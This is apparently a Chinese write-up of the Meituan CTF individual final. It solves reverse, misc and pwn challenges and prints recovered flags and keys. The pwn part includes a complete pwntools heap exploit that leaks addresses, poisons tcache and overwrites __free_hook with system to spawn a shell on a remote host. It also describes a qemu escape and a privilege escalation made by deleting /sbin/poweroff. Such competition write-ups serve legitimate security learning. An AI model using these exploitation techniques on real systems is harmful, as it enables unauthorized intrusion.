查看原文
其他

美团CTF个人决赛WP

mi1itray-axe 合天网安实验室 2022-11-05

Reverse

ROP

解析data的ROP,一点一点还原

from pwn import *
opcode = open('data''rb').read()
opcode_gadget = opcode[0x30+8:]
for offset in range(0len(opcode_gadget), 8):
    print(f'{hex(u64(opcode_gadget[offset:offset+8]))}')

提取出来密文,转成64位的

cipher = [0x980x7A0xDF0x570xC60xE30x180xC70x110x070xC70xD40x020xD20x9E,
          0x430x3A0xCE0x320x040x330x2D0x300x300xAB0x030x840xB20xA90x090xAA0x40]
cipher=[int.from_bytes(bytes(cipher[i:i+8]), 'little')  for i in range(0,32,8)]

分析gadget都是通过设置rax和参数寄存器,然后call rax触发函数,函数只有4种

地址效果
0x4011D6异或两个64bit
0x401233变种的异或,配合0x4011d6就是swap
0x401332两个64bit相减
0x4013EE检查输入是否满足uuid格式
0x401480提取uuid中32位字符到bss段数组
0x40125D两个64bit相加

流程是一开始将一个32位字符放到bss段中,这个bss贴近我们输入放入bss段的位置,参与到运算

然后开始rop链,读取42个字符,提取uuid中32位字符,进行加密运算,运算的最后一部分是swap的操作,测试得知顺序改变为[2,3,0,1]

最后对比密文跳转结果

照着指令写一个逆回来的过程

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
uint64_t bss_flag[] = {347232500983967289046595473889173185711434646705400600847248725627564630361773545518422457791288368940160066508554139066486185547128807004559110426617186};
void add(int i,int j){
    bss_flag[i] -= bss_flag[j];
}

void sub(int i,int j){
    bss_flag[i] += bss_flag[j];
}

void xor1(int i,int j){
    bss_flag[i] ^= bss_flag[j];
}

int main(){
    sub(0x0,0x7);
    add(0x1,0x5);
    sub(0x3,0x7);
    add(0x0,0x5);
    add(0x0,0x7);
    sub(0x3,0x7);
    add(0x0,0x5);
    xor1(0x2,0x5);
    xor1(0x2,0x5);
    sub(0x3,0x7);
    sub(0x2,0x6);
    xor1(0x0,0x7);
    add(0x2,0x4);
    add(0x1,0x4);
    xor1(0x1,0x7);
    xor1(0x0,0x7);
    sub(0x0,0x5);
    sub(0x0,0x7);
    sub(0x0,0x5);
    add(0x1,0x7);
    xor1(0x1,0x5);
    add(0x1,0x6);
    sub(0x1,0x4);
    xor1(0x2,0x4);
    add(0x1,0x4);
    sub(0x0,0x6);
    sub(0x2,0x7);
    add(0x1,0x6);
    sub(0x2,0x5);
    add(0x0,0x7);
    xor1(0x3,0x6);
    add(0x2,0x4);
    xor1(0x0,0x6);
    xor1(0x0,0x5);
    xor1(0x3,0x7);
    xor1(0x0,0x4);
    xor1(0x2,0x5);
    xor1(0x2,0x6);
    xor1(0x2,0x6);
    xor1(0x3,0x4);
    xor1(0x0,0x7);
    xor1(0x2,0x5);
    xor1(0x0,0x4);
    xor1(0x3,0x5);
    xor1(0x1,0x6);
    xor1(0x3,0x7);
    xor1(0x0,0x4);
    xor1(0x1,0x4);
    xor1(0x2,0x7);
    xor1(0x1,0x7);
    xor1(0x0,0x4);
    xor1(0x2,0x6);
    xor1(0x0,0x5);
    xor1(0x1,0x7);
    xor1(0x0,0x5);
    xor1(0x0,0x4);
    xor1(0x3,0x6);
    xor1(0x1,0x7);
    xor1(0x2,0x5);
    xor1(0x0,0x7);
    xor1(0x0,0x7);
    xor1(0x2,0x4);
    xor1(0x3,0x4);
    xor1(0x3,0x7);
    printf("%s",(char *)bss_flag);
    // flag{eb4781b3-e3c5-475e-8af4-2fa50468f485}
}

crackme

go语言,一开始我ida还f5反编译不了,换了个才可以,难顶

直接sm4加密和rc4,sm4密钥写死在代码里

rc4的key在linese.txt里,密文也在里面

exp:

from binascii import unhexlify
from Crypto.Cipher import ARC4
from sm4 import SM4Key

c= unhexlify(b'cc53de43058c79e4e13dbfe4e1ece82ec7d70b0fe460d50a6e2dfbbdac0b22173124ac7dee560b026b9b4cf1394c9493ad62874b4ef2125bbe27f99827d2a801b1b994c90bc31caea1cc9dc09362b518')
key = b'd0cac74c1bbeea071817360e491585e8'
cipher = ARC4.new(key)
m = cipher.decrypt(c)
key0 = SM4Key(b'xc08asb890ajds0a')
print(key0.decrypt(m))

Misc

What is that

stegsolve直接切换几个通道就可以看到

pwn

hello

直接网上查到kernel pwn qemu 的非预期

ctrl+a然后c进入shell,cat flag没有权限,要再提权,删除/sbin/poweroff然后exit就可以到su权限,再cat flag就可以

heap

一个UAF+数组上溢出

这里可以输入负数,可以数组溢出就可以往上泄露地址,泄露出程序基地址后再相同手法修改free_hook就可以。

from pwn import *
context.log_level='debug'
#p=process('./pwn')
p=remote('47.95.8.59',42283)
elf=ELF('./pwn')
#libc=ELF('/usr/lib/freelibs/amd64/2.27-3ubuntu1.5_amd64/libc.so.6')
libc=ELF('./libc.so.6')

def add(size):
    p.sendafter(b'>\n'b'1')
    p.sendafter(b'add?\n'str(size).encode())

def dele(index):
    p.sendafter(b'>\n'b'2')
    p.sendafter(b'up?\n'str(index).encode())

def edit(index,size,content):
    p.sendafter(b'>\n'b'3')
    p.sendafter(b'write?\n'str(index).encode())
    p.sendafter(b'write?\n'str(size).encode())
    p.sendafter(b'Content:', content)

def show(index):
    p.sendafter(b'>\n'b'4')
    p.sendafter(b'review?\n'str(index).encode())

show(-11)
p.recvuntil('Content:')
probase=u64(p.recv(6).ljust(8,b'\x00'))-0x4008
arraddr=probase+0x4060
add(0x10)
add(0x10)
add(0x10)
dele(0)
dele(1)
dele(2)
edit(1,8,p64(arraddr))
add(0x10)
add(0x10)
add(0x10)
edit(2,8,p64(probase+elf.got['puts']))
show(0)
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.symbols['puts']
free_hook=libc_base+libc.symbols['__free_hook']
system=libc_base+libc.symbols['system']
edit(2,8,p64(free_hook))
edit(0,8,p64(system))
add(0x10)
edit(3,8,b'/bin/sh\x00')
dele(3)
p.interactive()

https://tttang.com/archive/1411/#toc_urlclassloader https://goodapple.top/archives/1749

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。


更多详情,点我查看!

CTF靶场实操,戳“阅读原文“

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存